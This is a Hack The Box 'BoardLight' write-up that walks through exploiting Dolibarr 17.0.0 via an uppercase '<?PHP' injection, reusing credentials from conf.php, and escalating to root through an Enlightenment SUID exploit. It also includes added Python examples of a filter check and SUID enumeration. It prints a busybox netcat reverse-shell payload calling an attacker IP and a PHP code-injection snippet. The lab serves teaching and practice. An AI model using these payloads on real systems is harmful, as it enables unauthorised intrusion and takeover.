# BoardLight

{% embed url="<https://app.hackthebox.com/machines/BoardLight>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Summary

In this challenge, we exploited a vulnerability in Dolibarr CRM (version 17.0.0), allowing us to execute PHP code via an unsanitized input in the websites module. After gaining access as `www-data`, we discovered credentials in the `conf.php` file and reused them to log in as `larissa` via SSH. Further enumeration revealed custom SUID binaries, which we exploited to escalate privileges to root and retrieve the final flag.

## Recon

We start with an Nmap scan and find only two open ports. We have SSH available on port `22` and an Apache web server is running on port `80`.

<figure><img src="/files/1vMzjejdTKJAXK9KF1yQ" alt=""><figcaption></figcaption></figure>

When visiting the web root in a browser, we only find a static page.

<figure><img src="/files/dL3W8yCwQvHGKWebOZOX" alt=""><figcaption></figcaption></figure>

Our directory scan with Feroxbuster also seems to confirm this. However, we also see that this is a PHP server.

<figure><img src="/files/Xjhw5D4EJWALiD0DdqLj" alt=""><figcaption></figcaption></figure>

But we still find something useful on the static page. In the 'About Shop' section, we find an info email address that reveals the domain `board.htb`. We add this to our `/etc/hosts`.

<figure><img src="/files/PMhvM1yZIY9ZeWU468sP" alt=""><figcaption></figcaption></figure>

With a subdomain scan using FFuF (fuzzing the `Host` header and filtering out responses with the default word count), we find the subdomain `crm`.

{% code overflow="wrap" %}

```
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://board.htb/ -H "Host:FUZZ.board.htb" -fw 6243
```

{% endcode %}

<figure><img src="/files/vdjjT2vXOhVKvTW0WLFA" alt=""><figcaption></figcaption></figure>

Dolibarr is an open-source ERP (Enterprise Resource Planning) and CRM (Customer Relationship Management) software designed to help businesses manage various operations like sales, inventory, and accounting. The login page reveals that this instance runs version `17.0.0`.

<figure><img src="/files/JvOIAu9sFxwHuK4WjMTl" alt=""><figcaption></figcaption></figure>

## Shell As www-data

We try to log in with default credentials and are successful.

<figure><img src="/files/EoklXb4OFOalIvNZCLSP" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/cFRfoc6GluD554MZaxLM" alt=""><figcaption></figcaption></figure>

We also find a suitable vulnerability: CVE-2023-30253, which affects Dolibarr versions before 17.0.1 and allows an authenticated user to execute remote code.

{% embed url="<https://github.com/advisories/GHSA-9wqr-5jp4-mjmh>" %}

> Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: \<?PHP instead of \<?php in injected data.

{% embed url="<https://starlabs.sg/advisories/23/23-4197/>" %}

> ### Vulnerability Summary:
>
> Users can be granted privileges to add and modify pages in the websites module. Even though there are security settings to only allow HTML/JavaScript/CSS, this can be subverted. Existing checks being to detect PHP content from user-supplied input are insufficient as it only checks for `<?php` and `<?=`, allowing usage of the `<?` short tag for executing PHP code. As a result, an adversary is able to inject unsanitized PHP content into these web pages and achieve code execution via PHP
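To make the bypass described above concrete, here is an added Python example (written for this writeup, not Dolibarr's own code) that models the pre-17.0.1 behaviour as a case-sensitive substring check for `<?php` and `<?=`, contrasts it with a hardened check, and runs both over constructed page bodies including the exact `<?PHP` payload used below. The sample bodies, the function names and the `script_tag` variant are constructed for illustration.

```python
import re

# Constructed sample page bodies. The "uppercase" entry is the payload this
# writeup uses; the others are the spellings an attacker would try next.
SAMPLES = {
    "lowercase": '<section><?php system("id"); ?></section>',
    "short_echo": '<section><?= system("id") ?></section>',
    "uppercase": '<section><?PHP echo system("whoami"); ?></section>',
    "short_tag": '<section><? system("id"); ?></section>',
    "script_tag": '<section><script language="php">system("id");</script></section>',
    "benign": '<section id="mysection1" contenteditable="true"><p>Hello</p></section>',
}


def naive_contains_php(content: str) -> bool:
    """Approximation of the pre-17.0.1 check as the advisories describe it:
    a case-sensitive substring search for '<?php' and '<?='.
    This models the described behaviour; it is not Dolibarr's own code."""
    return "<?php" in content or "<?=" in content


# PHP's opening tag is case-insensitive, and a bare '<?' is honoured whenever
# short_open_tag is enabled, so every '<?' has to count. The legacy
# <script language="php"> opener (removed in PHP 7) is matched for old runtimes.
PHP_OPEN = re.compile(r"<\?")
SCRIPT_PHP = re.compile(r"<script[^>]*\blanguage\s*=\s*[\"']?php", re.IGNORECASE)


def hardened_contains_php(content: str) -> bool:
    """Reject any PHP opener regardless of case or short-tag form."""
    return bool(PHP_OPEN.search(content) or SCRIPT_PHP.search(content))


def evaluate(check) -> dict:
    """Run a check over every sample; True means 'PHP detected, page rejected'."""
    return {name: check(body) for name, body in SAMPLES.items()}


def bypasses(check) -> list:
    """Names of the PHP-carrying samples that slip past the given check."""
    return [n for n, flagged in evaluate(check).items()
            if n != "benign" and not flagged]


if __name__ == "__main__":
    print("naive    :", bypasses(naive_contains_php))     # uppercase, short_tag, script_tag
    print("hardened :", bypasses(hardened_contains_php))  # []
```

The hardened check also rejects an `<?xml` prolog; that is deliberate, because with `short_open_tag` on, PHP would interpret that too. More generally, a blocklist on the opener is a weak control: the durable fix is not to write user-controlled content into a file that the PHP engine later parses, or to render such pages as static text.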

To exploit this vulnerability, we create a website as shown below.

<figure><img src="/files/wmr5hqM1RyNdeYcJndJk" alt=""><figcaption></figcaption></figure>

We are adding a new page to this:

<figure><img src="/files/9BdqwAmaiqSypuU9u1TR" alt=""><figcaption></figcaption></figure>

We then have to define a title and a page name/alias.

<figure><img src="/files/yhmzfEGGdFyUerAUzDRw" alt=""><figcaption></figcaption></figure>

After we have created the page, we edit the source using '`Edit HTML Source`'.

<figure><img src="/files/6uhHXu7YePqM9DutfctA" alt=""><figcaption></figcaption></figure>

Before going for a shell, we first inject a simple command to verify that PHP code is actually executed.

```
<!-- Enter here your HTML content. Add a section with an id tag and tag contenteditable="true" if you want to use the inline editor for the content  -->
<section id="mysection1" contenteditable="true">
<?PHP echo system("whoami"); ?>
</section>
```

<figure><img src="/files/8B7bGbJ6VxT5txlvNWLP" alt=""><figcaption></figcaption></figure>

By clicking on the binoculars we are redirected to our created page.

<figure><img src="/files/12V5oekCdqRe5hU1FIEM" alt=""><figcaption></figcaption></figure>

We see that the command was executed successfully.

<figure><img src="/files/NUS6o383PSwVZhQuqu0J" alt=""><figcaption></figcaption></figure>

Next, we set up a listener.

<figure><img src="/files/p5j72iYcTdopjeUaoIcv" alt=""><figcaption></figcaption></figure>

And prepare a payload for a reverse shell using `busybox`.

```
<!-- Enter here your HTML content. Add a section with an id tag and tag contenteditable="true" if you want to use the inline editor for the content  -->
<section id="mysection1" contenteditable="true">
<?PHP echo system("busybox nc 10.10.14.54 80 -e /bin/bash"); ?>
</section>
```

<figure><img src="/files/Y4XVa65wAHdwCnIgEwV9" alt=""><figcaption></figcaption></figure>

After previewing the page we get a connection back. We are `www-data`.

<figure><img src="/files/0ruhudSk0uRBfml3Vr5w" alt=""><figcaption></figcaption></figure>

## Shell as larissa

When enumerating as `www-data`, we see that the board page belongs to larissa. Maybe we can find useful credentials in one of the config files.

<figure><img src="/files/LJfspSF5DFmeZXaGARCg" alt=""><figcaption></figcaption></figure>

We search for the config file conf.php and find it in `/var/www/html/crm.board.htb/htdocs/conf/conf.php`.

```
find / -type f -name "conf.php" 2>/dev/null
```

<figure><img src="/files/KB7q7dviQPuqtWnohJRy" alt=""><figcaption></figcaption></figure>

In this we find the credentials for the database user.

<figure><img src="/files/g7HOplFobqm5PDXgjLwm" alt=""><figcaption></figcaption></figure>

Fortunately, at least in our case, the credentials were reused. With the database password from `conf.php`, we can log in to the machine as `larissa` via SSH. In the home directory of `larissa` we find the first flag.

<figure><img src="/files/YehvuMCVnIYU0oZM5lHx" alt=""><figcaption></figcaption></figure>

## Shell as root

When enumerating as `larissa`, the SUID binaries stand out: they belong to the Enlightenment window manager, a fitting match for the name of the box. These are not the usual binaries found on GTFOBins, but they may still have known vulnerabilities that yield a `root` shell.

<figure><img src="/files/mHZEkQAYIu0XVKepL2tL" alt=""><figcaption></figcaption></figure>
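The enumeration step above, as an added Python example (not part of the original writeup): it does what `find / -perm -4000 -type f 2>/dev/null` does, then removes the SUID binaries a stock Debian/Ubuntu install ships so that only the unusual ones remain. The baseline set is an assumption to tune per distribution, and the sample tree is constructed in a temporary directory; the Enlightenment helper path is the one the public CVE-2022-37706 exploit targets and is included only as the "custom" entry.

```python
import os
import stat
import tempfile

# Assumed baseline of SUID binaries on a stock Debian/Ubuntu install. Anything
# outside it deserves a closer look; adjust the set to the target distribution.
COMMON_SUID = {
    "passwd", "sudo", "su", "mount", "umount", "chsh", "chfn", "gpasswd",
    "newgrp", "fusermount3", "pkexec", "ssh-keysign",
}


def is_suid(mode: int) -> bool:
    """True for regular files with the set-user-ID bit (the leading 4 in 4755)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_suid(root: str) -> list:
    """Equivalent of `find ROOT -perm -4000 -type f`; symlinks are not followed,
    and unreadable entries are skipped like the 2>/dev/null in the shell form."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if is_suid(st.st_mode):
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def unusual_suid(paths: list, baseline=COMMON_SUID) -> list:
    """Drop the stock binaries; what remains is the candidate list for a CVE search."""
    return [p for p in paths if os.path.basename(p) not in baseline]


def build_sample_tree() -> str:
    """Constructed sample tree: one stock SUID binary, the Enlightenment helper
    targeted by CVE-2022-37706, a plain non-SUID file and a symlink to a SUID
    file (which must not be reported). Returns the temporary root."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    files = {
        "usr/bin/passwd": 0o4755,
        "usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys": 0o4755,
        "usr/bin/ls": 0o755,
    }
    for rel, mode in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(b"#!/bin/sh\n")
        os.chmod(path, mode)
    os.symlink(os.path.join(root, "usr/bin/passwd"),
               os.path.join(root, "usr/bin/passwd-link"))
    return root


if __name__ == "__main__":
    demo_root = build_sample_tree()
    found = find_suid(demo_root)
    print("all SUID    :", found)
    print("non-standard:", unusual_suid(found))
```

Run against `/` on the target (as `larissa`, or earlier as `www-data`), the non-standard list is the shortlist to search in exploit-db or the vendor's advisories; the baseline comparison is what makes the Enlightenment helpers jump out instead of being buried among `passwd`, `sudo` and friends.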

We are able to locate the following exploits for CVE-2022-37706, a local privilege escalation in Enlightenment, of which the latter one actually works.

{% embed url="<https://www.exploit-db.com/exploits/51180>" %}

{% embed url="<https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit>" %}

We clone the repository and set up a Python web server to serve the files; alternatively we could have used `scp`.

<figure><img src="/files/NnSDWy2xZUYaOeVcNvvT" alt=""><figcaption></figcaption></figure>

Next, we just need to download the exploit on the target, make the script executable and run it. We are `root` and find the last flag at `/root/root.txt`.

<figure><img src="/files/jpUP7ViBcGxi3JGVUM44" alt=""><figcaption></figcaption></figure>


